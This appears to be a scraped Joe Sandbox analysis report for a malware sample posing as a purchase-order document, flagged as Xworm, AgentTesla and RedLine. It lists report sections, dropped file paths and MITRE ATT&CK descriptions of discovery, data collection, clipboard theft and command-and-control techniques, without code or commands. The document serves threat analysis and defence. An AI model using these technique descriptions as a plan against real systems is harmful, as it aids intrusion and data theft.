Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ORDERDATASHEET#PO8738763.scr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Threatname: Agenttesla

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\XClient.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\regsvcs.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1kdycl4x.gyb.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3vslwxn4.tve.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5l5cwsev.riv.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a4gs5tl3.mvt.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aqgmusst.sis.ps1

Windows Analysis Report
ORDERDATASHEET#PO8738763.scr.exe

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre